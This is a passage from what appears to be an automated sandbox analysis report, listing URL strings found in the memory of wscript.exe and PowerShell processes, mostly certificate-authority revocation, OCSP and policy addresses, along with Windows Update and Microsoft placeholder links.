Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016747138.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: wscript.exe, 00000000.00000003.2014886520.000001B66CD8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl2.postsignum.cz/crl/psrootqca4.crl01
Source: wscript.exe, 00000000.00000003.2024611329.000001B66CDEF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/
Source: wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049962776.000001B66AEBD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AEBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2024611329.000001B66CDBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7c3ca03910489
Source: wscript.exe, 00000000.00000003.2025795412.000001B66CD62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025577082.000001B66CD31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025686902.000001B66CD5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025331654.000001B66CD0A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?7c3ca03910
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
Source: powershell.exe, 00000002.00000002.2761711892.000001CB10070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.accv.es0
Source: wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.ncdc.gov.sa0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.pki.gva.es0
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.suscerte.gob.ve0
Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.digidentity.eu/validatie0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pki.registradores.org/normativa/index.htm0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
Source: wscript.exe, 00000000.00000003.2025795412.000001B66CD62000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025577082.000001B66CD31000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051411506.000001B66CD5F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2048272066.000001B66CD5A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025686902.000001B66CD5B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025331654.000001B66CD0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000002.00000002.2624324723.000001CB00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2474889182.0000000004DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
Source: wscript.exe, 00000000.00000003.2014920806.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CDBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acabogacia.org/doc0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.acabogacia.org0
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.accv.es00
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ancert.com/cps0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es
Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: powershell.exe, 00000005.00000002.2474889182.0000000004F04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014886520.000001B66CD8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: wscript.exe, 00000000.00000003.2014743187.000001B66CDCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016613844.000001B66CEBA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.chambersign.org1
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.comsign.co.il/cps0
Source: wscript.exe, 00000000.00000003.2015316928.000001B66CD67000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF8E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: wscript.exe, 00000000.00000003.2014793443.000001B66CDAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.defence.gov.au/pki0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.disig.sk/ca0f
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.dnie.es/dpc0
Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.e-me.lv/repository0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: wscript.exe, 00000000.00000003.2025331654.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2026077213.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049654599.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2051485295.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014743187.000001B66CDCA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2025261904.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014759639.000001B66CDCE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024942075.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2024611329.000001B66CDC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.eme.lv/repository0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014585557.000001B66CDF7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.globaltrust.info0=
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.oaticerts.com/repository.
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: wscript.exe, 00000000.00000003.2014942835.000001B66CD80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pki.gva.es/cps0%
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: wscript.exe, 00000000.00000003.2014484947.000001B66CEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: wscript.exe, 00000000.00000003.2015360503.000001B66AF82000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014638603.000001B66CEBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: wscript.exe, 00000000.00000003.2014812401.000001B66CDA6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rcsc.lt/repository0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: wscript.exe, 00000000.00000003.2014522538.000001B66CEB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014678394.000001B66CDD3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: wscript.exe, 00000000.00000003.2014551191.000001B66CDEC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2015014084.000001B66AF89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014661712.000001B66CDF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: wscript.exe, 00000000.00000003.2014759639.000001B66CDBC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: wscript.exe, 00000000.00000003.2014830264.000001B66CD91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: powershell.exe, 00000002.00000002.2624324723.000001CB00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2474889182.0000000004DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBeq
Source: powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2478265897.0000000005E17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: wscript.exe, 00000000.00000003.2015404722.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2014996011.000001B66CD76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2016665644.000001B66CD7E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: wscript.exe, 00000000.00000003.2012535888.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2050078693.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2049565069.000001B66AECD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2050934752.000001B66AF08000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF2D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012887665.000001B66AF52000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2012243856.000001B66AF18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
